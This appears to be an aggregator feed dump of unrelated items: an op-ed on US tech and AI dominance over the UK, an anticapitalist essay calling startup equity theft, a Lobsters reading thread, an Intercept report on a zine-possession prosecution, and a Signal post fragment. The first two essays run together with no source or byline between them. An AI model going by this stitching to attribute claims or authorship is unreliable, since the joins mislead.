The pattern was sustained through the 2000s and 2010s. Cloud computing was quickly cornered by Amazon and Microsoft. No serious European or UK competitor emerged to challenge platforms such as Uber or Airbnb. These companies have undoubtedly brought us convenience and entertainment, but the wealth of the internet has not spread as widely as many hoped; instead, US firms took the lion’s share, becoming the most valuable corporations in history. Now the same thing is happening with artificial intelligence. Once more, the big profits look destined for Silicon Valley.
How did all this meet with such little resistance? In short, the UK and Europe followed the logic of free trade and globalisation. Nations, according to this theory, should focus only on what they do best. So just as it made sense for the UK to import French burgundies and Spanish hams, it also seemed logical to rely on American technology rather than trying to do it locally. Better to specialise instead in the UK’s own strengths, such as finance, the creative industries – or making great whisky.
But when it comes to these new platforms, the analogy with regular trade breaks down. There is a vast difference between fine wines and the technologies that underpin the entire online economy. Burgundies can be pricey, but they don’t extract value from every commercial transaction or collect lucrative data. The trade theories of the 1990s masked the distinction between ordinary goods and what are, in effect, pieces of market infrastructure – systems essential to buying and selling. That’s what Google and Amazon represent. A better analogy might be letting a foreign firm build toll roads across the country, charging whatever it likes to use them.
We’re seeing this again with the build-out of artificial intelligence. During President Trump’s state visit in September, the UK proudly celebrated Google and Microsoft’s investments in “datacentres” – vast warehouses of computer servers that power AI systems. Yet datacentres are the bottom rung of the AI economy, private infrastructure that simply channels profits back to US headquarters.
In another timeline, the UK could have been a true leader in AI. US researchers were once far behind their British and French counterparts. Yet, in a move neither Washington nor Beijing would have permitted, the UK cheerfully allowed the sale of most of its key AI assets and talent over the last decade or so –
DeepMind’s purchase
by Google being the most famous example. What remains is an AI strategy consisting of the supply of electricity and land for datacentres. It’s like being invited to a party only to discover you’re there to serve the drinks.
If tech platforms are indeed like toll roads, the logical step would be to limit their take – perhaps by capping fees or charging for data extraction. Yet no country has done so: we accept the platforms but fail to regulate their power as we do with other utilities. The European Union has come closest, with its
Digital Markets Act
, which regulates how dominant platforms treat dependent businesses. The US government, for its part, is also at the mercy of its homegrown tech giants, yet Congress remains paralysed.
If the UK wanted to take a different path, to resist this economic colonisation and extraction, it could partner with the European Union and perhaps Japan in order to develop a joint strategy – one that forces platforms to support local businesses and nurtures alternatives to mature US technologies. So far, though, alongside other nations disadvantaged by American dominance, it has been slow to adapt, instead hoping that the 90s playbook will still work, despite evidence to the contrary.
The truth is that we now live in a more cynical and strategic era. One way or another, the world needs an anti-monopoly framework with far greater force than anything seen so far. Wherever you live, it’s clear the world would be better off with more firms from different countries. The alternative is not only costly but politically dangerous, feeding resentment and dependence. We can do better than a future where what counts as economic freedom is merely a choice between relying on the United States, or relying on China.
Google, the Silicon Valley company par excellence, proclaimed its mission to “organise the world’s information” and adopted “don’t be evil” as its corporate motto. And what could possibly be wrong with such aspirations? Indeed, most company leaders and high-tech workers in the Valley genuinely believe they are “making the world a better place” while also making money.
Silicon Valley is the progressive face of capitalism. We’ve experienced it, intimately. Billions of people, across the globe, enjoy real benefits from searching the world’s information, connecting with people across time and space, and carrying supercomputers in their pockets. Silicon Valley doesn’t obviously throw workers into factories and mines for endless hours on low pay; such images are hidden, rendered distant by the supply chain. Instead, the Valley, in our imaginations, is populated by knowledge workers, a diverse and smart workforce that designs, solves, and codes in humane office spaces, with above-average wages, ping pong, cafeterias, flexible working hours, sleeping cubicles. What’s not to like?
We could consider the Valley’s hidden workers, those who clean, wait tables, wash cars, nanny, deliver packages, tend gardens, fix infrastructure for poverty wages; we could explore the trailer parks down the road from Google HQ, or document the shootings in the streets, the homeless that push shopping trolleys up and down the El Camino, their world a bundle of rags; or the gun shops that sell semi-automatics, the out-of-control, over-staffed police, armed with military-grade cast-me-downs, that regularly gun down the poor; the families crowded into small apartments, the father who spends his days scouring trash bins for recyclable bottles to trade for cash, the human trafficking of women, the prostitution, coerced to serve a predominately male workforce; or the disciplining and harassment of the undocumented, the deportations, the splitting up and destruction of families; or the local charities that collect food for kids, during seasonal holidays, since outside of school time their families cannot provide; or the extraordinarily high incarceration rates that control the surplus labour force, the armed guards on campuses and in schools, office complexes and shop interiors; or the poverty, the child who cannot concentrate in class since their teeth are rotting in their mouth, the extreme and devastating inequalities in wealth and income, the untreated illnesses and injuries, for lack of medical access, the widespread use of antidepressants, the addictions, the dispossessed, the broken dreams and the crying …
Yet these symptoms of a broken and decaying society are studiously ignored, repressed, unmentioned by Silicon Valley’s middle and upper classes. Psychological repression is widespread amongst the highly paid of the Valley. It’s a defence: it’s just too damn painful to contemplate the full horror of social reality. And life can be organised to avoid it, or deny it. So many don’t even notice.
I could mention all the evil business models, where vast computing power and fancy algorithms trawl our digital footprints to track and surveil, to sell and manipulate, to intensify our addictions; and we might reflect on the Valley’s enormous and continuing contributions to building military machines that rain down death and destruction.
Instead, here, in this article, I want to point to the root problem,
the ultimate source of evil
, and explain why Silicon Valley is hypocrisy on a grand scale. The Valley’s movers and shakers believe they are progressive, that entrepreneurial capitalism is the road to utopia. But it’s not. In fact, the opposite is the case: the Valley is a cause of this horror, of the social ills, and the social breakdown that it must repress: it is both responsible and culpable for creating a dystopia.
I want all the talented, hopeful, optimistic high-tech workers, who genuinely want to make the world a better place, who are about to found a new and exciting startup, to just take a short pause, to stop, look around, think, reflect and reconsider: the kind of firm you incorporate, the institutional rules you adopt, is precisely the choice point between doing evil and doing good.
I will try to explain. My apologies if it takes a little while, since if the following facts were readily understood and generally accepted, then Silicon Valley would already be good, not evil, and I wouldn’t need to explain.
Silicon Valley: midwife of the capitalist firm
The Valley is all about startups. They spring up all the time. New exciting and hopeful adventures. It’s like forming a band, but better.
In huge, mature corporations the social relations of production are obscured by layers of hierarchy and absentee ownership. But in a startup the power relations are direct and visible, and often share an office with you. You can observe the basic unit of production in capitalism—the capitalist firm—as if under a microscope.
Let’s lay out the property relations of a (slightly simplified) typical startup.
The startup has owner(s), usually “high net worth” individuals, either directly present or indirectly in the form of venture capital firms. Venture capital provides the initial funds for the new venture. The actual founders, the ones with the ideas and talent, but no money, also part own the firm. The divvying up of the initial share issue between founders and early investors is a detail. The founders, armed with a new injection of capital, then recruit workers by convincing them of “the vision”. These are the first employees. And off we go.
The owner(s) of the startup are in complete control, and their decisions are final. Owners can promote, demote, hire and fire anyone, at any time. Owners set wage levels, which are kept secret (and the workers, being earnest and highly disciplined, avoid this subject with each other—that would break a taboo). Startups are definitely not run on democratic lines: workers don’t get to appoint managers, set strategy, or distribute profits. Instead, the startup is a mini dictatorship: sure, there’s plenty of technical debate, and back-and-forth, and head scratching, but ultimately it’s a dictatorship.
The owners pay all input costs—such as office rental, computers, electricity and heating, labour, etc. They own all outputs, such as new software or hardware, and any inventions (which, in the Valley, are aggressively patented). The owners take any profits and bear any losses of the company. The startup’s bank accounts are hidden from the workers, and out of their control.
This basic social relation—between profit-taking capitalist owners and wage-earning workers—is constitutive of capitalism. For example, today you can travel to Shropshire, England, and visit Ironbridge village, one of the birthplaces of the industrial revolution and “the silicon valley of the 1800s”. You can tour an early ironworks and see the great furnaces where workers toiled, the tiny administrative office (to dole out wages, and keep accounts), and nearby, on a large hill overlooking the site, the capitalists’ large and imposing mansions.
The form may have changed, but not the content. In this sense, Silicon Valley is deeply conservative. It proclaims to disrupt everything, and make all fresh, new and shiny—except this basic social relationship.
Almost all Silicon Valley workers accept these social relations as entirely natural, acceptable, and pretty much fair and equitable. The owners fund the company. They therefore “own the firm”. The owners risk a lot of capital, and the workers receive a good wage, based on supply and demand in the marketplace, plus some ramp-up time to try and invent new stuff, which is fun. What’s not to like? What’s the problem?
Silicon Valley: it’s theft all the way down
Startups reproduce, in embryo form, the wage system, where the capitalist owner hires-in labour at a pre-agreed rental price. In a capitalist firm, labour is just another ex ante cost of production. The workers mix their labour with inputs and produce an output for sale. Normally, firms sell at prices that exceed their costs of production, which include the cost of used-up inputs, rent, interest on capital loans, wage costs, etc. Any residual income then gets distributed as profit to the owner, or owners, of the firm.
Imagine that you and I agree to exchange something in the marketplace, say a second-hand iPhone on eBay. You get the money, I get an iPhone. You may get a good deal, or I may get a good deal, depending on our “higgling and haggling” in the marketplace. Whether a fair price is struck, or not, there’s an exchange of something for something: some goods for some money. This social transaction satisfies a “principle of exchange”. We’ve swapped stuff, and no-one forced us to.
But let’s say I just took the iPhone from you. And you received no money at all. This violates the principle of exchange. I got something for nothing: some goods, some resources, for free. That’s theft. Obviously so.
All startups in Silicon Valley violate the principle of exchange and institute a system of theft
. They are theft-based institutions. If the startup is successful and grows, so does the theft, since theft is baked into the institutional structure of the firm, right from the get go. If the startup goes global, like an Apple, Facebook, or Google, then the cancer spreads and the theft takes place on a global scale.
But the theft is hidden. We need some reflection to really see it.
The workers in a startup are the actual cause of any profits it makes. We can demonstrate this with a simple thought experiment: imagine the workers stopped working. Would the firm have any possibility of making a profit, or if already profitable, continue to make that profit? But we don’t need to imagine. This is called a strike. And owners hate it, since it kills their profit.
So, in any company, including a startup, the workers create the value.
What, then, do the owners contribute or create?
The owners, or venture capitalists, contribute capital. They advance money to fund the startup until it (hopefully) starts making money. And then they expect a return. Since they’ve given something they should definitely get something back, otherwise we violate the principle of exchange. In fact, they should expect repayment of the sums advanced and—let’s be generous here—also a risk premium (since most startups fail without making profit) and, also—in order to be really straight and fair about this—some collateral as security (such as first dibs on any outstanding assets if the venture fails). This seems like a fair exchange.
It is. So far so good.
But if early investors merely did this—that is, simply advance some loan capital—they would not become the owners of the firm. Once the startup made money, the loan would be repaid (by the firm), and the early investors would have no further claims on the fruits of others’ labour (that is, the value created by the workers).
The important point is this: loan capital does not violate the principle of exchange.
But Silicon Valley startups are not funded by loan capital. Venture capitalists want, and get, much more than this. They advance capital to a firm, but in addition to being repaid, they demand ownership of the firm, i.e. equity capital, and receive stock (shares in the firm). And so they “own the firm”. In consequence, once their initial loan and risk premium is repaid, they get even more: they retain a claim on the firm’s future income, that is, the fruits of others’ labour, in perpetuity (or until the firm dissolves, or they sell their shares, etc.).
And the mere legal ownership of a firm is sufficient to lay claim on its profit. And, right here, is precisely the moment when the principle of exchange is violated. Once the firm repays its debt, the early investors are made whole. Beyond this point, we have workers creating profits, and owners appropriating that profit without needing to contribute an hour of their time, or a dime from their pockets. The owners are getting something for nothing. The owners can, as John Stuart Mill put it, “grow richer, as it were in their sleep”. There’s no exchange. Just appropriation. And that is what’s commonly, and accurately, called economic exploitation.
The important point is this: equity capital violates the principle of exchange.
Sometimes the meaning of a social situation can suddenly flip. You notice something new, like an object in the wrong place, or a small inconsistency that points to a secret, or a lie. This is one of those occasions. There’s an enormous difference between advancing capital to a firm, and owning a firm. This vital distinction is conspicuously absent from all the upbeat, world-changing, and progressive chit-chat in the coffee shops, restaurants, offices and homes of Silicon Valley. So let’s pretend they might be listening, that all their chatter stops, just for a moment, and we whisper into each and every individual ear: equity capital is theft.
When you take profits, but contribute nothing to the output of a firm, other than holding a paper claim, you are stealing.
Yet this is how startups in Silicon Valley are organised. Cohort after cohort of “smart” groups of highly educated workers are quite happy to sign up to their own exploitation, and cede control over how they organise their working day, and what they produce. The most effective prison is the one you don’t realise you’re in.
But hold on. Look, we’ve woken the libertarian consciousness of Silicon Valley, and its rationality is strong and terrible: those that were whispered to have been stirred, and they reply, in unison: No-one forces workers to accept these terms, and the wage contract is voluntary, and therefore perfectly OK! Go away, annoying socialist, and stop spoiling our fun!
Silicon Valley: forcing people to sell their labour
Do workers freely enter into the wage contract? Do founders, with great ideas, have the freedom to start new commercial ventures that aren’t based on theft? To answer, let’s first define non-exploitative social relations of production.
In principle, Silicon Valley startups could be incorporated as profit-sharing worker cooperatives. In this type of institution, all working members share the profit, which is democratically distributed. So if you join the co-op, you get a say, and you get profit shares. If you leave, you don’t anymore. The firm is collectively owned by its current working members.
Worker co-ops don’t hire in labour at a pre-agreed rental price. They do the opposite. They hire-in capital at a pre-agreed rental price (i.e., raise loan capital, not equity capital). So capital, not labour, is merely another ex ante cost of production with no claim on the residual income of the firm.¹
In a democratic worker co-op, the principle of exchange is not violated, and no-one systematically exploits others and steals the value they (jointly) created. Clearly, this is a more lucrative deal for workers: profit-sharing is better than a wage. So why doesn’t this happen in the Valley? Why don’t lots of workers incorporate worker co-ops?
There are some carrots and a stick.
The carrot: join us, join us!
High-tech workers, especially those with in-demand skills, get more than wages: they get stock options.
A stock option bestows the right to purchase company shares at a (very low) predefined price. You have to work, normally for many years, before you can exercise that right. The aim is worker retention, and to align incentives so that workers are motivated to create profits “for the company”. Stock options, in a sense, automatically bestow the material benefits of trade unionism without the need to organise. Any worker is, of course, glad of this potential source of additional income.
But stock options, when exercised, are equity capital and confer (part) ownership of the firm: and, as we’ve seen, that fundamentally means participating in theft. Stock options, therefore, invite a section of the working class to join the elevated ranks of the capitalist class, and start exploiting others’ labour. (In practice, most stock options turn out worthless, since most new ventures fail. But it’s the hope that motivates).
In a small startup, as is common in Silicon Valley, it’s especially clear that the workers create all the added value. But the owner(s) appropriate it. So even the best educated minds start to notice. And this doesn’t seem entirely fair. So stock options function to muddy the waters, and paper over the inconvenient truth of exploitation.
So that’s one carrot, which pushes high-tech workers to sign up to a capitalist firm. But there are more. If a group of workers decide to incorporate a new venture then, unless they are highly politically conscious and especially moral creatures, they will incorporate a capitalist firm, not a worker co-op. Why? Because you’ll definitely make more money by owning a firm, paying others wages, and keeping the profit to yourself.
Many startup founders in Silicon Valley know they’re ripping off the workers they employ. They might soothe their guilt by pointing out they offer stock options, or throw themselves into libertarianism, which conveniently coincides with their material interests. But it’s a fact that stock is normally heavily concentrated amongst a few early founders and venture capitalists. As time goes on, the founders’ contributions are eclipsed by those of the hired workers, and then it’s just exploitation all down the line. The company is bought out, the founders get their initial advances and more, and therefore cash in, and make their millions. But, in almost all cases, they did not contribute to the creation of that value—they stole it from the workers they hired.
So the wage contract is sweetened by stock options. That works. But the contract is only voluntary if the workers have other options, if they have a choice. Do they?
The stick: reproduce capitalism or wither and die
But there are sticks too, which remove all choice, and prevent founders from incorporating worker co-operatives, even if they were sufficiently politically conscious to want to.
Silicon Valley is famous for its vibrant and extensive venture capital community. Plenty of capital swills around, continually searching, like Sauron’s great eye, for the latest hit company to fund, and therefore own and exploit the efforts and creativity of hundreds and thousands of workers.
Any venture capitalist, quite naturally, wants to maximise their returns. So, if faced with a choice between funding two companies, A and B, where A is a capitalist firm, and therefore offers equity in return for capital, whereas B is a worker co-op, and only offers interest repayments in return for capital, then the venture capitalist will always opt to fund A. No contest. Equity capital is strictly a better deal than loan capital. (And it’s not just more money, but also top-down dictatorial control of the company’s direction, and the working conditions and wage levels of employees. And being powerful is much more fun than being powerless. It’s great for the ego.)
Hence worker co-ops don’t get funded in Silicon Valley, and never will. So all those talented and creative workers, with good ideas for making things that people want, have no choice but to incorporate a capitalist firm, and begin sorting people into a class of owners, and a class of workers.
I witnessed an especially ugly example at a Silicon Valley business conference. An “Angel Investor” (someone who provides early seed capital) presented a talk about the criteria they apply when deciding which new ventures to invest in, and therefore what aspiring founders should do in order to maximise their chances of raising capital. A big factor, for the Angel, was that founders also raise money from friends and family, since “the desire to not disappoint loved ones is a great stimulant to hard work”. The Angel gave examples of “great stories” about teams they’d funded and the great returns made “by everybody”. At the close, the Angel invited any founders in the audience to come and pitch their ideas to him—right there and then.
A line of about twenty or so young people formed in front of the Angel, desperate to get funding for their cherished ideas. And there it was, like a frozen scene from a perverted nativity: an anointed minority of one, with the monopoly on capital, and an unwashed majority, full of aspirations and creativity, lining up, cap-in-hand, to proffer the sacrifice of equity in their newborn, and surrender themselves to exploitation.
There was no choice, there is no choice: either submit to capital or watch your ideas wither and die. There are no other practical ways to raise significant capital. Real Angels don’t exist: those that ask only for their loan to be repaid, and not ownership of the firm; who reject the social relationship of equity capital, and therefore only invest in new ventures that incorporate as democratic worker-owned co-ops, so that all profit is shared, according to actual merit and contribution. If such fabled beings were present, the line before them would have been much, much longer.
There is no choice. Founders must incorporate capitalist firms, and must rent-in labour. And workers, who need income, don’t have the option to join a worker co-op. They must sign the wage contract. This isn’t voluntary, it’s coerced—by those with the monopoly on capital.
Silicon Valley culture celebrates venture capital, the Schumpeterian heroic entrepreneur, the dynamism of capitalism, and the gee-whiz technical and creative ideas of startup founders. But Silicon Valley repeatedly and continually reproduces exploitation, where some members of the firm own it, and others simply rent their labour to it. There’s zero innovation or disruption in this sphere. The Valley is a great engine, churning out new companies, day after day, which reproduce the division between an economic class that wins, and an economic class that loses.
Economic inequality has always been around. But notably, in the last 30 years or so, economic inequality, in the rich countries, has significantly increased. So we find people at the bottom struggling for food and shelter, while those at the top earn many years’ worth of the average salary while they sleep. The majority in the middle work hard yet lack savings, living their entire lives a few paychecks from destitution.
Things have got so bad that even mainstream discourse has shifted to reflect the new reality. We’re routinely told that millennials face low wages, poor quality jobs, high debt, and worse economic outcomes compared to their parents. People now accept that the political system is rigged by a rich elite who’ve captured the institutions of the nation state. And even the arch conservative world of academic economics talks about inequality. And that simply didn’t happen as recently as ten years ago.
Bourgeois thinkers struggle to explain the major cause of economic inequality, because to do so requires thinking deeply about property relations and the issue of systematic exploitation. Instead, they prefer to think about unequal human capital endowments, taxation policies, interest and growth rates, the saving habits of workers, rising costs in child and health care, or the impact of automation. They’ll think about anything and everything except the actual reason for inequality.
Capitalist firms, in an important sense, are social machines, institutions that operate within the context of a market economy to “sort” individuals into different classes by means of the wage system. This sorting produces a very specific income and wealth distribution, which is peculiar to capitalism. Empirically, capitalist societies exhibit two distinct regimes: a lognormal distribution of wage income, and a Pareto distribution of profit income.²
In any dynamic society, with a continual reallocation of the division of labour as new skills are demanded and other skills are automated or changed, we should expect some level of wage inequality due to mismatches between supply and demand in the labour market. Also, some jobs are terrible and dangerous, and people should get more for risking more. And some people really do contribute more within the workplace, and it’s OK if they get additional rewards from their peers, if only to make sure they stick around. And some people actually need more, perhaps due to illness or disabilities or additional domestic responsibilities. All this is fine.
But, empirically, we see more than wage inequality. We see two distinct regimes. We see a majority earning wages, at the bottom of the scale, and a minority taking profits, at the top of the scale. Capitalist societies produce extreme inequalities where the top 10% or so take a big and disproportionate slice of the social pie.
And the reason is obvious, for those willing to look: the major cause of economic inequality is the wage system itself. The more workers a capitalist exploits, the more profit they make. The more profit they make, the more workers they can exploit. And capitalists in the super-rich bracket enjoy positive feedback effects. They can hardly lose. The economic game is entirely rigged in their favour. And, in this elevated state, they fall asleep and wake up the next morning having earned more than workers do in their entire lifetimes.
In fact, the inequality between capitalists far exceeds the inequality between workers. The super-rich become astronomically rich as we bounce along the power-law tail of the Pareto distribution. The astronomically rich capture ostensibly democratic institutions, a phenomenon that is particularly clear in the USA, so that even mild social reforms are off the table. We’ve seen a collection of post-war policies that once mitigated economic inequality ditched in the last thirty years or so. This is why things have got even worse. Economic exploitation has increased.
Extreme economic inequality causes untold misery. At the top we see excessive and wasteful hyper-consumption. At the bottom, countless everyday struggles to live a dignified life. All the social ills of Silicon Valley, many of which are hidden in plain sight, are suffered mostly by the poorly paid, those with the least money. But inequality affects everyone. Societies with high Gini coefficients do worse on almost all measures of social well-being.
But it doesn’t have to be this way. Let’s imagine an impossible event, just for the sake of illustrating a point. Imagine that all the people we whispered to—in the cafes, the offices and homes of Silicon Valley—actually listened, and decided, right there and then, to abolish exploitation, and resolved, with great determination, to only ever incorporate worker co-ops, and only lend capital, and never demand equity, then—with one decisive and unlikely step—Silicon Valley would actually begin to do good. Because it’s at this precise pivotal moment—the birth of a new productive unit—that a society’s social relations of production either get reproduced, or changed. For once you start to abolish the wage contract, and the renting of human beings, you start to abolish economic classes and extreme income inequality. Wealth would then start to be shared more equitably, and fairly, upon the principle of exchange, according to actual contributions to production, and not specious paper claims. The Pareto upper-regime would lose its material basis, would totter and fall, and therewith all the power that goes with it, the ability to capture and corrupt democracies and run them for the benefit of a privileged and undeserving few. The majority of the population would have more, enjoy more, and live better.
You know, perhaps some really gifted entrepreneurs could figure out a way to export this culture, and good social outcomes, to the rest of the world.
Silicon Valley: bullshit progressivism
But sadly, as of today, that is a dream. And it’s not even a dream that’s widely shared. Silicon Valley does not see the connection between the kinds of firms it funds and creates, and the kinds of social ills that surround it.
But why single out Silicon Valley? What I’ve just described applies to capitalism in general.
Silicon Valley deserves especial opprobrium because the contradiction between its self-image and its reality is particularly stark. Silicon Valley desperately, desperately wants to view itself, and be seen as, socially progressive, enlightened, cutting-edge and, yes, utopian.
But despite the explosion of ideas and firms, and the progressive rhetoric, the core propositions of capitalism are completely untouched, inviolate. The coupling of radical technical experimentation, with extreme conservation of capitalist property relations, has been a very successful recipe for the Valley’s elite.
But the very startups that want to “change the world for the better” immediately reproduce economic exploitation: they separate human beings into a class that must rent their labour, and a class that appropriates the fruits of that labour; a class that is disciplined and must do as they are told in the workplace, and a class that disciplines and commands without democratic control. Every time an optimistic and earnest group of workers, with some great ideas, incorporates a startup and issues equity, any progressive content of those ideas is irreparably harmed.
Yet this is the specific evil that Silicon Valley does: it funnels the progressive content of technical utopianism (the increase in the forces of production) into institutions that exploit workers on a global scale, and contribute to extreme economic inequality (the existing social relations of production). Silicon Valley helps produce the dystopia we live in. It doesn’t change the world for the better. It makes it worse, every single day.
The narcissistic self-image of Valley culture contributes to its political backwardness. Some workers celebrate a victory when corporate HR departments commit to diversity in the workplace, or promise to address the gender pay gap. But these are easy concessions for capitalism, softballs, and the owners of your firm will happily accommodate you. Just don’t ask for bottom-up democracy in the workplace, or profit-sharing. Try it. You’ll get a very different response.
But that’s what I do wish for. And I’m talking to you now, fellow workers of the Valley! If you really want to do no evil, to be good, disrupt the status quo and make the world a better place, then don’t create a capitalist firm: it’s a top-down dictatorship, where the dictators steal the money. There’s nothing progressive about this kind of social institution. Founding such a startup is deeply unethical, represents institutionalised theft, and is a prime cause of diverse social ills.
Instead, use your talents to create democratic worker-owned cooperatives, based on equality among their working members; or help think of creative ways to solve the political problem of capitalists’ monopoly on capital.³
Abolishing economic exploitation genuinely makes the world a better place. Reproducing it in your startup does not.
What are you reading and plan to read next?
Lobsters
lobste.rs
2025-11-23 11:25:03
Also what were you reading? What are you planning to read next? Feel free to ask questions about books you see in the post or comment!
I've finished reading the Memory Code by Lynne Kelly — and can highly recommend for unusual point of view on how illiterate society stores information. Still working through The Powerful Python by Aaron Maxwell, and it's not bad — it's just not that much of a time right now.
My plans for non-technical books: the Ukrainian translation of A Memory Called Empire by Arkady Martine (the original was perhaps the best sci-fi of my 2024, let's see how much of it made it into the translation). Also started Patrick O'Brian's Master and Commander, recommended by a fellow lobsterer in a similar thread years ago — great reading both in eink and audio!
The Feds Want to Make It Illegal to Even Possess an Anarchist Zine
Intercept
theintercept.com
2025-11-23 11:00:00
Daniel Sanchez is facing federal charges for what free speech advocates say is a clear attack on the First Amendment.
A detail view of the badge worn by Matthew Elliston during an ICE hiring event on Aug. 26, 2025, in Arlington, Texas.
Photo: Ron Jenkins/Getty Images
Federal prosecutors have
filed a new
indictment
in response to a July 4 noise demonstration outside the Prairieland ICE detention facility in Alvarado, Texas, during which a
police officer was shot
.
There are numerous problems with the indictment, but perhaps the most glaring is its inclusion of charges against a Dallas artist who wasn’t even at the protest. Daniel “Des” Sanchez is accused of transporting a box that contained “Antifa materials” after the incident, supposedly to conceal evidence against his wife, Maricela Rueda, who was there.
But the boxed materials aren’t Molotov cocktails, pipe bombs, or whatever MAGA officials claim “Antifa” uses to wage its imaginary war on America. As prosecutors laid out in the July
criminal complaint
that led to the indictment, they were zines and pamphlets. Some contain controversial ideas — one was titled “Insurrectionary Anarchy” — but they’re fully constitutionally protected free speech. The case demonstrates the administration’s intensifying efforts to
criminalize left-wing activists
after Donald Trump announced in September that he was
designating
“Antifa” as a “major terrorist organization” — a legal designation that doesn’t exist for domestic groups — following the
killing
of Charlie Kirk.
Sanchez was first
indicted
in October on charges of “corruptly concealing a document or record” as a standalone case, but the new indictment merges his charges with those against the other defendants, likely in hopes of burying the First Amendment problems with the case against him under prosecutors’ claims about the alleged shooting.
It’s an escalation of a familiar tactic. In 2023, Georgia prosecutors listed “zine” distribution as part of the conspiracy charges against 61 Stop Cop City protesters in a
sprawling RICO indictment
that didn’t bother to explain how each individual defendant was involved in any actual crime. I wrote back then about my concern that this wasn’t just sloppy overreach, but also a
blueprint for censorship
. Those fears have now been validated by Sanchez’s prosecution solely for possessing similar literature.
Photos of the zines Daniel Sanchez is charged with “corruptly concealing.”
Photo: U.S. District Court, Northern District of Texas
There have been other warnings that cops and prosecutors think they’ve found a constitutional loophole — if you can’t punish reporting it, punish transporting it. Los Angeles journalist Maya Lau is suing the LA County Sheriff’s Department for secretly investigating her for conspiracy, theft of government property, unlawful access of a computer, burglary, and receiving stolen property.
According to her attorneys
, her only offense was
reporting
on a list of deputies with histories of misconduct for the Los Angeles Times.
If you can’t punish reporting it, punish transporting it.
It’s also reminiscent of the Biden administration’s
case
against right-wing outlet Project Veritas for possessing and transporting Ashley Biden’s diary, which the organization
bought from a Florida woman
later convicted of stealing and selling it. The Constitution
protects
the right to publish materials stolen by others — a right that would be meaningless if they couldn’t possess the materials in the first place.
Despite the
collapses
of the
Cop City prosecution
and the Lau investigation — and its own dismissal of the Project Veritas case — the Trump administration has followed those dangerous examples,
characterizing
lawful activism and ideologies as
terrorist
conspiracies (a strategy Trump allies also
floated
during his first term) to seize the power to prosecute pamphlet possession anytime they use the magic word “Antifa.”
That’s a chilling combination for any journalist, activist, or individual who criticizes Trump.
National security reporters
have long dealt with the
specter of prosecution
under the archaic
Espionage Act
for merely obtaining government secrets from sources, particularly after the Biden administration extracted a
guilty plea
from WikiLeaks founder
Julian Assange
. But the rest of the press — and everyone else, for that matter — understood that merely possessing written materials, no matter what they said, is not a crime.
Guilt by Literature
At what point does a literary collection or newspaper subscription become prosecutorial evidence under the Trump administration’s logic? Essentially, whenever it’s convenient. The vagueness is a feature, not a bug. When people don’t know which political materials might later be deemed evidence of criminality, the safest course is to avoid engaging with controversial ideas altogether.
The slippery slope from anarchist zines to conventional journalism isn’t hypothetical, and we’re already sliding fast. Journalist
Mario Guevara
can tell you that from El Salvador, where he was deported in a clear case of retaliation for livestreaming a No Kings protest. So can Tufts doctoral student
Rümeysa Öztürk
, as she awaits deportation proceedings for
co-writing an opinion piece
critical of Israel’s wars that the administration considers evidence of support for terrorism.
At least two journalists lawfully in the U.S. —
Ya’akub Ira Vijandre
and
Sami Hamdi
— were nabbed by ICE just last month. The case against
Vijandre
is partially based on his criticism of prosecutorial overreach in the
Holy Land Five
case and his liking social media posts that quote Quranic verses, raising the question of how far away we are from someone being indicted for transporting a Quran or a news article critical of the war on terror.
Sanchez’s case is prosecutorial overreach stacked on more prosecutorial overreach. The National Lawyers Guild
criticized
prosecutors’ tenuous dot-connecting to justify holding 18 defendants responsible for one gunshot wound. Some defendants were also charged with
supporting
terrorism due to their alleged association with “Antifa.” Anarchist zines were
cited
as evidence against them, too.
Sanchez was charged following a search that ICE proclaimed on
social media
turned up “literal insurrectionist propaganda” he had allegedly transported from his home to an apartment, noting that “insurrectionary anarchism is regarded as the most serious form of domestic (non-jihadi) terrorist threat.” The tweet also said that Sanchez is a green card holder granted legal status through the Deferred Action for Childhood Arrivals program.
The indictment claims Sanchez was transporting those materials to conceal them because they incriminated his wife. But how can possession of literature incriminate anyone, let alone someone who isn’t even accused of anything but being present when someone else allegedly fired a gun? Zines aren’t contraband; it’s
not illegal
to be an anarchist or read about anarchism. I don’t know why Sanchez allegedly moved the box of documents, but if it was because he (apparently correctly) feared prosecutors would try to use them against his wife, that’s a commentary on prosecutors’ lawlessness, not Sanchez’s.
Violent rhetoric is subject to punishment only when it constitutes a “
true threat
” of imminent violence. Even then, the speaker is held responsible, not anyone merely in possession of their words.
Government prosecutors haven’t alleged the “Antifa materials” contained any “true threats,” or any other category of speech that falls outside the protection of the First Amendment. Nor did they allege that the materials were used to plan the alleged actions of protesters on July 4 (although they did allege that the materials were “anti-government” and “anti-Trump”).
We don’t need a constitutional right to publish (or possess) only what the government likes.
Even the aforementioned “
Insurrectionary Anarchy: Organizing for Attack
” zine, despite its hyperbolic title, reads like a think piece, not a how-to manual. It advocates for tactics like rent strikes and squatting, not shooting police officers. Critically, it has nothing to do with whether Sanchez’s wife committed crimes on July 4.
Being guilty of possessing literature is a concept fundamentally incompatible with a free society. We don’t need a constitutional right to publish (or possess) only what the government likes, and the “anti-government” literature in Sanchez’s box of zines is exactly what the First Amendment protects. With history and leaders like Vladimir Putin and Viktor Orbán as a guide, we also know it’s highly unlikely that Trump’s censorship crusade will stop with a few radical pamphlets.
The Framers Loved Zines
There’s an irony in a supposedly conservative administration treating anti-government pamphlets as evidence of criminality. Many of the publications the Constitution’s framers had in mind when they authored the First Amendment’s press freedom clause bore far more resemblance to Sanchez’s box of zines than to the output of today’s mainstream news media.
Revolutionary-era America was awash in highly opinionated, politically radical literature. Thomas Paine’s “Common Sense” was designed to inspire revolution against the established government. Newspapers like the Boston Gazette printed inflammatory
writings
by Samuel Adams
and others
urging the colonies to prepare for war after the Coercive Acts. The Declaration of Independence itself recognized the right of the people to rise up. It did not assume the revolution of the time would be the last one.
One might call it “literal insurrectionist propaganda” — and some of it was probably transported in boxes.
The framers enshrined press freedom not because they imagined today’s professionally trained journalists maintaining careful neutrality. They protected it because they understood firsthand the need for journalists and writers who believed their government had become tyrannical to espouse revolution.
For all their many faults, the framers were confident enough in their ideas that they were willing to let them be tested. If the government’s conduct didn’t call for radical opposition, then radical ideas wouldn’t catch on. It sure looks like the current administration doesn’t want to make that bet.
Recently I got a friend to finally join me on Signal. He asked something about whether or not Signal is truly secure and private, like if it was safe from US government surveillance. I told him: “Well, it’s end-to-end encrypted, so they don’t know what we’re talking about, but they definitely know that we’re talking to each other.”
